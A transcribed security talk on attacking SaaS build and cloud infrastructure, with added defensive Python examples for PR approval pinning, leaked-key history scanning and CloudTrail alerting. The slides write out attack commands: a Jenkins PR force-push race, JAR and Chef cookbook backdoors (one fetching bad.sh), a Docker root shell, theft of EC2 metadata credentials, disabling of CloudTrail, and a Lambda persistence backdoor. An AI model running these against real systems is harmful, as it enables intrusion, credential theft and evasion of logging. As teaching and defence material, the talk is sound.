Attacking Modern SaaS Companies. Sean Cassidy
- Harold Richards
- 5 years ago
Transcription
1 Attacking Modern SaaS Companies Sean Cassidy
2 Who I am How to Implement Crypto Poorly 2
3 Software-as-a-Service 3
4 Software-as-a-service 4
5 Motivation 5
6 * *Except that it's actually pretty different 6
7 7
8 Goal of this talk
- Explain how SaaS software is made
- How we use the cloud
- And why that's useful for you to know as security/IT people
- This is a huge topic, so this is an introduction
- Breadth over depth
9 The Conclusion 9
10 Access to developer's laptop Config Container Artifact Build NoSQL Cloud Management Server Server API Config DB = Access to everything 10
11 Access to anything = Access to everything 11
12 Why are SaaS companies different? 12
13 How are SaaS Companies Different?
- Fast, iterative development process
- Lots of automation
- Empowered engineers
- Lots of brand new, powerful tools
- Lack of security culture
14 There are also weaknesses 14
15 Weaknesses of SaaS Companies
- Fast, iterative development process
- Lots of automation
- Empowered engineers
- Lots of brand new, powerful tools
- Lack of security culture
Weaknesses:
- Linchpin servers
- But usually not much security monitoring
- No security strategy or planning
- You can use them for evil
- Little to no budget for security
16 Building a SaaS Product 16
17 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 17
18 Building a SaaS Product Build Server Continuous Integration builds the code and runs tests 18
19 Continuous Integration 19
20 Continuous Integration
- Build is triggered
- Source code is downloaded
- Source code is compiled
- Tests are run
- Software is packaged
- Uploaded to artifact server
21 Here's an example of one way to get in 21
22 Continuous Integration dot slash hack We want to run our code on their Jenkins so that we can backdoor everything it builds 22
23 Continuous Integration dot slash hack Anyone can submit a PR on public Github projects 23
24 Continuous Integration dot slash hack Some people use Jenkins public Github projects 24
25 Continuous Integration dot slash hack If we submit a PR, will it just run our code? 25
26 Continuous Integration dot slash hack 26
27 Continuous Integration dot slash hack 27
28 Continuous Integration dot slash hack
"When a new pull request is opened in the project and the author of the pull request isn't whitelisted, builder will ask "Can one of the admins verify this patch?" One of the admins can comment "ok to test" to accept this pull request for testing, "test this please" for one time test run and "add to whitelist" to add the author to the whitelist."
29 Continuous Integration dot slash hack Five minutes sounds like polling 29
30 Continuous Integration: How GHPRB works
1. Every 5 minutes, poll
2. Find every open pull request
3. Check to see if
   - the author is whitelisted, or
   - the PR is accepted (once or forever)
4. If not, post comment
5. If so, build PR and run tests
31 Continuous Integration: Work around GHPRB
- Post innocuous PR that requires running tests
- Bot will post "Can admin verify?" within 5 minutes
- Admin user will write "test this please"
- Within 5 minutes, force push a new malicious commit
    git commit --amend -a; git push -f
Avoid s this!
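The race on slides 30 and 31 exists because the approval is attached to the pull request rather than to the commit the admin looked at. The model below is an added example, not code from the talk or from the GHPRB plugin: a polling builder that pins each approval to the head SHA it asked about and asks again if the head has moved. All class and function names are hypothetical, and every approval command is treated as valid for the pinned commit only, which is stricter than the behaviour quoted on slide 28.

```python
"""Bind a PR approval to the commit that was reviewed.
Added example modelling a polling PR builder; hypothetical, not GHPRB code."""
from dataclasses import dataclass, field

ASK = "Can one of the admins verify this patch?"
COMMANDS = ("ok to test", "test this please", "add to whitelist")


@dataclass
class PullRequest:
    number: int
    author: str
    head_sha: str                                   # tip of the PR branch right now
    comments: list = field(default_factory=list)    # (user, body), oldest first

    def force_push(self, new_sha):
        """The effect of an amended commit pushed with -f: the head SHA changes."""
        self.head_sha = new_sha


@dataclass
class PinnedBuilder:
    admins: set
    whitelist: set = field(default_factory=set)
    asked_sha: dict = field(default_factory=dict)   # PR number -> head SHA the bot asked about
    builds: list = field(default_factory=list)      # (PR number, SHA) actually built

    def approval(self, pr):
        """Latest admin command posted after the bot's most recent question."""
        command = None
        for user, body in pr.comments:
            if user == "bot":
                command = None                      # a new question voids earlier approvals
            elif user in self.admins and body.strip() in COMMANDS:
                command = body.strip()
        return command

    def build(self, pr, sha):
        if (pr.number, sha) in self.builds:
            return "up to date"
        self.builds.append((pr.number, sha))        # check out this SHA, never the branch name
        return "built"

    def poll(self, pr):
        """One polling cycle for one open pull request."""
        if pr.author in self.whitelist:             # whitelisting trusts the author outright
            return self.build(pr, pr.head_sha)
        if self.asked_sha.get(pr.number) != pr.head_sha:
            # First sight of the PR, or the head moved since the question the
            # admin answered: pin the new head and ask again.
            self.asked_sha[pr.number] = pr.head_sha
            pr.comments.append(("bot", f"{ASK} (commit {pr.head_sha})"))
            return "asked"
        command = self.approval(pr)
        if command is None:
            return "waiting"
        if command == "add to whitelist":
            self.whitelist.add(pr.author)
        return self.build(pr, pr.head_sha)


def replay(force_push_after_approval):
    """Replay slide 31's sequence; return the builder's answers and its builds."""
    builder = PinnedBuilder(admins={"maintainer"})
    pr = PullRequest(7, "contributor", head_sha="aaa111")   # constructed values
    answers = [builder.poll(pr)]                    # bot asks about aaa111
    pr.comments.append(("maintainer", "test this please"))
    if force_push_after_approval:
        pr.force_push("bbb222")                     # head changes before the next poll
    answers.append(builder.poll(pr))
    return answers, builder.builds
```

With the pin in place the force-pushed commit is never built; the bot asks about the new SHA and the admin has to look again.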
32 Continuous Integration dot slash hack 32
33 Continuous Integration dot slash hack 33
34 Continuous Integration dot slash hack 34
35 Continuous Integration dot slash hack 35
36 Continuous Integration dot slash hack 36
37 What do you do if you get shell on Jenkins? 37
38 Backdooring Jenkins
We can read/write to any file Jenkins controls
    jenkins:~$ ls -al
    -rw-r--r-- 1 jenkins jenkins Apr :24 config.xml
    -rw-r--r-- 1 jenkins jenkins Mar 23:31 credentials.xml
    drwxr-xr-x 2 jenkins jenkins Apr 19:59 .m2
    drwx jenkins jenkins Mar 19:11 secrets
    drwxr-xr-x 2 jenkins jenkins Apr 21:16 updates
    drwxr-xr-x 2 jenkins jenkins Mar 23:32 usercontent
    drwxr-xr-x 4 jenkins jenkins Mar 19:14 users
    drwxr-xr-x 4 jenkins jenkins Mar 19:13 workspace
39 Backdooring Jenkins JARs
You don't need the actual class. Same classpath and signature is enough
    package hacked;
    import victim.MyClass;
    public class Hacked {
        public static void main(String... args) {
            System.out.println("Hacked!");
            MyClass.main(args);
        }
    }
40 Backdooring Jenkins JARs
    $ echo "Main-Class: hacked.Hacked" > addition
    $ jar uf victim.jar hacked/
    $ jar umf addition victim.jar
    $ java -jar victim.jar
    Hacked!
41 41
42 Continuous Integration dot slash hack
- There's loads more you can do with this
- See Jonathan Claudius's 2013 talk: "Attacking Cloud Services with Source Code"
43 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 43
44 Deployment 44
45 Deployment
- LXC (Docker, CoreOS, etc.)
  - Virtualized OS with all dependencies included
  - CI will usually build the entire image
- Configuration management software
  - Chef
  - Puppet
  - Ansible, etc.
- Custom Scripts
46 Security Pitfalls: Easy Docker Root Shell
If the user is in the docker group, they can run containers without sudo
    $ docker run -v /home/${user}:/h_docs ubuntu \
        bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;"
    $ ls -la rootshell
    -rwsrwxrwx 1 root root Apr 17 rootshell
    $ ~/rootshell -p
    # whoami
    root
Source: Zachary Keeton
47 47
48 48
49 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 49
50 Config Management 50
51 Configuration Management
- Your software depends on
  - ntpd running and the time being correct
  - Recent Linux kernel version
  - imagemagick installed
- Are all 175 nodes up to date?
- Do they have these packages installed?
- How do you peer review and approve changes?
52 Configuration Management: Chef
- Infrastructure as code
- Describe what, not how
    directory '/opt/application/config' do
      owner 'service'
      mode '0750'
      action :create
      recursive true
    end
53 Configuration Management: Chef and Knife
- Knife is the CLI to interact with Chef
- ~/.chef/knife.rb
  - Where the Chef server is
- ~/.chef/user.pem
  - The private RSA key for Knife
54 Chef: For the attacker
- List of every node in every environment
    knife node list
- Installed packages for every machine
    knife search "*" -a packages
- Kernel version
    knife search "*" -a kernel.release
- Secrets
    knife search "*" -l | grep password
55 Chef: For the attacker
- Find more data
    knife data bag list
    knife data bag show ssl certs
- Run arbitrary SSH commands
    knife ssh "*" COMMAND
  This will prompt for SSH auth
56 Chef: Backdooring everything
    knife search "*" -a recipes | sort | uniq -c | sort -n -r | head
    106 zsh::default
    106 sysstat::default
    106 sudo::default
    106 slack_handler::default
    106 slack::default
57 Chef: Backdooring everything
    knife cookbook download zsh
    cat backdoor.rb >> zsh/recipe/default.rb
    knife cookbook upload zsh

    cat backdoor.rb
    bash 'backdoor' do
      code <<-EOF
        wget bash bad.sh
      EOF
    end
58 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 58
59 Provisioning 59
60 Provisioning
- The web console
  - Slow, inaccurate, hard to review changes
- CLI
    aws ec2 run-instances --image-id someid
- Provisioning
  - CloudFormation
  - OpenStack Heat
  - Terraform
61 Terraform
    resource "aws_instance" "web" {
      instance_type = "t2.micro"
      ami           = "some_ami_id"
      subnet_id     = "${aws_subnet.default.id}"
    }
    $ terraform plan
    $ terraform apply
62 Scary!
    $ terraform destroy -force
This can be mitigated by
- Auto-scaling groups
- Restricting permissions
63 Provisioning Pitfalls
- If you can run provisioning commands or scripts, you can do (almost) anything
- Continuous integration usually runs provisioning
- If you're really bold, just check in your backdoor
64 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 64
65 65
66 The Cloud: Access Keys
Key: ASIAXD5KAAKA8WW3T029
Secret: jd5mdxiztfuvr+doq/ltklt8bml7nwzbnxh8rvaiko4 ml3/4nq/yk
67 The Cloud: Access Keys
Find them
- baked into application's config
- Developer's machines or Jenkins
    ~/.aws/credentials
- Sometimes committed to source control and then reverted
    git rev-list --all | xargs git grep -E 'A[A-Z0-9]{19}'
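The same history search from the defender's side, as an added example that is not from the talk: it walks `git log -p` output and reports every access key ID that was ever added, including ones a later commit removed, since deleting a key from the tree does not revoke it. The pattern is the slide's `A[A-Z0-9]{19}` narrowed to the `AKIA` and `ASIA` prefixes; the function names and the sample log are constructed for this example.

```python
"""Find AWS access key IDs that were ever added in a repository's history,
including ones later reverted. Added example; the sample log is constructed."""
import re
import subprocess

# The slide's pattern A[A-Z0-9]{19}, narrowed to the long-term (AKIA) and
# temporary (ASIA) access key ID prefixes.
KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[A-Z0-9]{16}\b")


def history_patches(repo):
    """Return every commit's patch, oldest first (needs git and a local clone)."""
    cmd = ["git", "-C", repo, "log", "--all", "--reverse", "-p", "--format=commit %H"]
    return subprocess.run(cmd, check=True, capture_output=True, text=True).stdout


def scan_history(patch_log):
    """Return one finding per (key ID, path): the commit that added it and,
    if it was taken out again, the commit that removed it."""
    found = {}
    commit = path = None
    in_header = False                    # between "diff --git" and the first "@@"
    for line in patch_log.splitlines():
        if line.startswith("commit "):
            commit, in_header = line.split()[1], False
        elif line.startswith("diff --git "):
            in_header = True
        elif line.startswith("@@"):
            in_header = False
        elif in_header:
            if line.startswith(("--- a/", "+++ b/")):
                path = line[6:]
        elif line.startswith("+"):       # line added by this commit
            for key in KEY_ID.findall(line):
                entry = found.setdefault((key, path), {"added": commit, "removed": None})
                entry["removed"] = None  # re-added after an earlier removal
        elif line.startswith("-"):       # line removed by this commit
            for key in KEY_ID.findall(line):
                if (key, path) in found:
                    found[(key, path)]["removed"] = commit
    return [{"key": k, "path": p, **v} for (k, p), v in sorted(found.items())]


# Constructed sample in the format history_patches() produces. The first key is
# the placeholder from AWS documentation, the second is the one shown on slide 66.
SAMPLE_LOG = """\
commit 1111111

diff --git a/config/app.yml b/config/app.yml
new file mode 100644
--- /dev/null
+++ b/config/app.yml
@@ -0,0 +1,2 @@
+region: us-east-1
+aws_access_key_id: AKIAIOSFODNN7EXAMPLE
commit 2222222

diff --git a/config/app.yml b/config/app.yml
--- a/config/app.yml
+++ b/config/app.yml
@@ -1,2 +1 @@
 region: us-east-1
-aws_access_key_id: AKIAIOSFODNN7EXAMPLE
commit 3333333

diff --git a/deploy.sh b/deploy.sh
--- a/deploy.sh
+++ b/deploy.sh
@@ -1 +1,2 @@
 #!/bin/sh
+export AWS_ACCESS_KEY_ID=ASIAXD5KAAKA8WW3T029
"""

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_LOG):
        state = f"removed in {finding['removed']}" if finding["removed"] else "still in the tree"
        print(f"{finding['key']} {finding['path']} added in {finding['added']}, {state}: rotate it")
```

Every finding needs rotation, whether or not the key is still in the tree. To scan a real clone, pass `history_patches("/path/to/repo")` to `scan_history`.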
68 68
69 The Cloud: Roles
- Avoid baking in keys: use roles!
- No keys, the node itself is authorized
- Ex: prod-file-uploader-role
  - PUT to S3
- prod-account-service-role
  - Create new IAM roles with custom policies
  - Create new S3 buckets
70 How else can you get access keys? (AWS)
    some-ec2-node $ curl -s /iam/security-credentials/
    prod-file-uploader-role
    some-ec2-node $ curl -s /iam/security-credentials/prod-file-uploader-role
71 How else can you get access keys? (AWS)
    some-ec2-node $ curl -s /iam/security-credentials/prod-file-uploader-role
    {
      "AccessKeyId": "ASIAXD5KAAKA8WW3T029"
      "SecretAccessKey": "KJidf3k209/kq3wJXz1j.."
      "Token": "DS2jja09tiyBn/////////ajd31JEw.."
    }
72 AWS Access Keys from AWS Roles
- Keys work outside of that instance and VPC
- Valid for up to an hour
- Need all three parts to work:
    $ export AWS_ACCESS_KEY_ID=ASIAXD5KAAKA8WW3T029
    $ export AWS_SECRET_ACCESS_KEY=KJidf3k209/kq3wJXz1j..
    $ export AWS_SESSION_TOKEN=DS2jja09tiyBn/////////ajd31..
- Then you can do whatever that role can do
    $ aws ec2 describe-instances
    $ aws ec2 terminate-instances --instance-ids...
73 What can the EC2 Instance Metadata API do?
    some-ec2-node $ curl -s /instance-identity/document/
    {
      "privateIp" : " ",
      "availabilityZone" : "us-east-1a",
      "instanceId" : "i-19c466fde3aba901a",
      "instanceType" : "t2.small",
      "accountId" : " ",
      "imageId" : "ami-3eb083aa",
    }
74 What can the EC2 Instance Metadata API do?
    some-ec2-node $ curl -s
    #!/bin/bash
    #
    # Bootstrap script for EC2
    #... code here, maybe passwords, secrets, etc.
75 The Cloud Logs 75
76 Cloud Logs: Disrupting Logging
    aws cloudtrail delete-trail --name CloudTrail
    aws cloudtrail stop-logging --name CloudTrail
    aws cloudtrail update-trail --name CloudTrail --no-is-multi-region-trail --no-include-global-service-events
    aws s3 rb --force s3://my-cloudtrail-bucket
- S3 lifecycle rule to delete logs after 1 second
- Encrypt the logs with a key the company doesn't have
Source: Daniel Grzelak
77 Building a SaaS Product Components Build server Deployment Config management Provisioning Infrastructure-as-a-service More cloud specific 77
78 Backdoors 78
79 AWS Remote Access Tool
- How do you persist your compromise of AWS?
- If you just use a user with credentials, those users and credentials are often audited
- If you start an EC2 instance, that costs money, very visible
- What to do instead?
80 AWS RAT: Lambda
- Serverless computing
- Upload code, don't run servers
- Underutilized feature
- Free tier eligible
- Can assign a role to the lambda
- Roles are less often audited than Users
- Deploy in a region that they don't use
81 AWS RAT: Long-evans
- Optionally disables CloudTrail logging
- Provisions admin account for itself
- Installs innocuous Lambda
- Run it and see if your logging alerts or not
82 82
83 Blue Team 83
84 Advice for Blue Team
- Restrict direct developer access
- Automate everything
- Don't use the web console or CLI
- Continuous integration and monitoring is essential
- Peer review
- Choose new tech carefully
- What happens if X is compromised?
85 Advice for Blue Team
- Multiple Accounts
- Use Roles
- Isolate business and functional units
- Minimizes blast radius
- Reduce compliance and regulatory surface area
- Centrally manage and monitor many teams
More information: aws-multi-account-security-strategy/
86 Cloud Logs: What to alert on
- New access keys
- New provisioned users/roles/groups
- New instances/lambdas
- Suspicious Console Logins
- Disruption of logging
- And much more!
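The alert list above, turned into a triage pass over CloudTrail records, as an added example that is not from the talk. It maps CloudTrail event names to the slide's categories, treats bucket deletion and lifecycle changes as log disruption only when they hit a log bucket (slide 76), and flags new compute in regions the company does not use (slide 80). The rule set, the meaning given to "suspicious" logins, and the sample records are assumptions made for this example.

```python
"""Triage CloudTrail records for the alert categories on slide 86.
Added example: the rule set and the sample records are constructed."""

LOGGING = "disruption of logging"
IDENTITY = "new user/role/group"
COMPUTE = "new instance/lambda"

RULES = {  # CloudTrail eventName -> alert category
    "StopLogging": LOGGING,
    "DeleteTrail": LOGGING,
    "UpdateTrail": LOGGING,          # also covers re-keying or narrowing the trail
    "CreateAccessKey": "new access key",
    "CreateUser": IDENTITY,
    "CreateRole": IDENTITY,
    "CreateGroup": IDENTITY,
    "RunInstances": COMPUTE,
}
BUCKET_EVENTS = {"DeleteBucket", "PutBucketLifecycle"}   # alert only for log buckets


def classify(record, log_buckets):
    """Return the alert category for one CloudTrail record, or None."""
    name = record.get("eventName", "")
    if name in BUCKET_EVENTS:
        bucket = (record.get("requestParameters") or {}).get("bucketName")
        return LOGGING if bucket in log_buckets else None
    if name.startswith("CreateFunction"):    # Lambda appends the API version to the name
        return COMPUTE
    if name == "ConsoleLogin":
        failed = (record.get("responseElements") or {}).get("ConsoleLogin") == "Failure"
        no_mfa = (record.get("additionalEventData") or {}).get("MFAUsed") == "No"
        # Assumption: "suspicious" here means a failed login or one without MFA.
        return "suspicious console login" if failed or no_mfa else None
    return RULES.get(name)


def triage(records, log_buckets, used_regions):
    """Return (category, eventName, principal ARN, region) tuples to alert on."""
    alerts = []
    for record in records:
        category = classify(record, log_buckets)
        if category is None:
            continue
        name = record["eventName"]
        who = record.get("userIdentity", {}).get("arn", "unknown")
        region = record.get("awsRegion", "unknown")
        alerts.append((category, name, who, region))
        # Slide 80: new compute in a region the company does not use.
        if category == COMPUTE and region not in used_regions:
            alerts.append(("activity in unused region", name, who, region))
    return alerts


def sample_record(name, region="us-east-1", user="alice", **extra):
    """Build a constructed record with only the fields used above."""
    arn = f"arn:aws:iam::111122223333:user/{user}"
    return {"eventName": name, "awsRegion": region, "userIdentity": {"arn": arn}, **extra}


SAMPLE = [  # constructed records
    sample_record("StopLogging", user="build-bot"),
    sample_record("PutBucketLifecycle", requestParameters={"bucketName": "my-cloudtrail-bucket"}),
    sample_record("PutBucketLifecycle", requestParameters={"bucketName": "static-assets"}),
    sample_record("CreateRole"),
    sample_record("CreateFunction20150331", region="ap-southeast-2"),
    sample_record("ConsoleLogin", responseElements={"ConsoleLogin": "Success"},
                  additionalEventData={"MFAUsed": "Yes"}),
    sample_record("ConsoleLogin", responseElements={"ConsoleLogin": "Success"},
                  additionalEventData={"MFAUsed": "No"}),
    sample_record("DescribeInstances"),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE, {"my-cloudtrail-bucket"}, {"us-east-1"}):
        print(" | ".join(alert))
```

Alerts on logging disruption only help if they are delivered from somewhere the disrupted trail's own account cannot silence, which is one reason for the multi-account layout on slide 85.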
87 Thanks! Website:
More informationDevOps Anti-Patterns. Have the Ops team deal with it. Time to fire the Ops team! Let s hire a DevOps unit! COPYRIGHT 2019 MANICODE SECURITY
DevOps Anti-Patterns Have the Ops team deal with it. Time to fire the Ops team! Let s hire a DevOps unit! 31 Anti-Pattern: Throw it Over the Wall Development Operations 32 Anti-Pattern: DevOps Team Silo
More informationAlliance Key Manager AKM for AWS Quick Start Guide. Software version: Documentation version:
Alliance Key Manager AKM for AWS Quick Start Guide Software version: 4.0.0 Documentation version: 4.0.0.002 Townsend Security www.townsendsecurity.com 800.357.1019 +1 360.359.4400 Alliance Key Manager
More informationNET1821BU THE FUTURE OF NETWORKING AND SECURITY WITH NSX-T Bruce Davie CTO, APJ 2
NET1821BU The Future of Network Virtualization with NSX-T #VMworld #NET1821BU NET1821BU THE FUTURE OF NETWORKING AND SECURITY WITH NSX-T Bruce Davie CTO, APJ 2 DISCLAIMER This presentation may contain
More informationMOBILE APP FOR ACME INC. by Sean Hull - Cloud Solutions Architect -
MOBILE APP FOR ACME INC. by Sean Hull - Cloud Solutions Architect - sean@iheavy.com ABOUT SEAN HULL +1-917-442-3939 sean@iheavy.com iheavy.com/blog about.me/hullsean github.com/hullsean NEWSLETTER - SIGNUP!
More informationUSING NGC WITH GOOGLE CLOUD PLATFORM
USING NGC WITH GOOGLE CLOUD PLATFORM DU-08962-001 _v02 April 2018 Setup Guide TABLE OF CONTENTS Chapter 1. Introduction to... 1 Chapter 2. Deploying an NVIDIA GPU Cloud Image from the GCP Console...3 2.1.
More informationAWS Reference Design Document
AWS Reference Design Document Contents Overview... 1 Amazon Web Services (AWS), Public Cloud and the New Security Challenges... 1 Security at the Speed of DevOps... 2 Securing East-West and North-South
More informationAdopting Modern Practices for Improved Cloud Security. Cox Automotive - Enterprise Risk & Security
Adopting Modern Practices for Improved Cloud Security Cox Automotive - Enterprise Risk & Security 1 About Cox Automotive Cox Automotive is a leading provider of products and services that span the automotive
More informationepldt Web Builder Security March 2017
epldt Web Builder Security March 2017 TABLE OF CONTENTS Overview... 4 Application Security... 5 Security Elements... 5 User & Role Management... 5 User / Reseller Hierarchy Management... 5 User Authentication
More informationAmazon Web Services (AWS) Training Course Content
Amazon Web Services (AWS) Training Course Content SECTION 1: CLOUD COMPUTING INTRODUCTION History of Cloud Computing Concept of Client Server Computing Distributed Computing and it s Challenges What is
More informationAWS Service Catalog. User Guide
AWS Service Catalog User Guide AWS Service Catalog: User Guide Copyright 2017 Amazon Web Services, Inc. and/or its affiliates. All rights reserved. Amazon's trademarks and trade dress may not be used in
More informationHow can you implement this through a script that a scheduling daemon runs daily on the application servers?
You ve been tasked with implementing an automated data backup solution for your application servers that run on Amazon EC2 with Amazon EBS volumes. You want to use a distributed data store for your backups
More informationPrepAwayExam. High-efficient Exam Materials are the best high pass-rate Exam Dumps
PrepAwayExam http://www.prepawayexam.com/ High-efficient Exam Materials are the best high pass-rate Exam Dumps Exam : SAA-C01 Title : AWS Certified Solutions Architect - Associate (Released February 2018)
More informationA Cloud-based Architecture for Processing 3D Mars Terrain
OnSight A Cloud-based Architecture for Processing 3D Mars Terrain Parker Abercrombie Jet Propulsion Laboratory, California Institute of Technology 2016 California Institute of Technology. Government sponsorship
More informationI'm Andy Glover and this is the Java Technical Series of. the developerworks podcasts. My guest is Brian Jakovich. He is the
I'm Andy Glover and this is the Java Technical Series of the developerworks podcasts. My guest is Brian Jakovich. He is the director of Elastic Operations for Stelligent. He and I are going to talk about
More information1. What statistic did the wc -l command show? (do man wc to get the answer) A. The number of bytes B. The number of lines C. The number of words
More Linux Commands 1 wc The Linux command for acquiring size statistics on a file is wc. This command provides the line count, word count and number of bytes in a file. Open up a terminal, make sure you
More informationAWS Integration Guide
AWS Integration Guide Cloud-Native Security www.aporeto.com AWS Integration Guide Aporeto integrates with AWS to help enterprises efficiently deploy, manage, and secure applications at scale and the compute
More informationImmutable Servers. Building a deployment pipeline and deploying to EC2 Spot
Immutable Servers Building a deployment pipeline and deploying to EC2 Spot Instances @james_ridgway Who am I? My name is James Ridgway I work on the Dev side of DevOps Head of Platform and Data Science
More informationDevSecOps Why Aren t You Doing It? Brian Liceaga, CISSP 1
DevSecOps Why Aren t You Doing It? Brian Liceaga, CISSP 1 Agenda State of DevOps Value of DevOps Benefitting from DevOps DevSecOps What you can do as InfoSec 2 The State of DevOps - 2017 Automation is
More informationAWS Administration. Suggested Pre-requisites Basic IT Knowledge
Course Description Amazon Web Services Administration (AWS Administration) course starts your Cloud Journey. If you are planning to learn Cloud Computing and Amazon Web Services in particular, then this
More information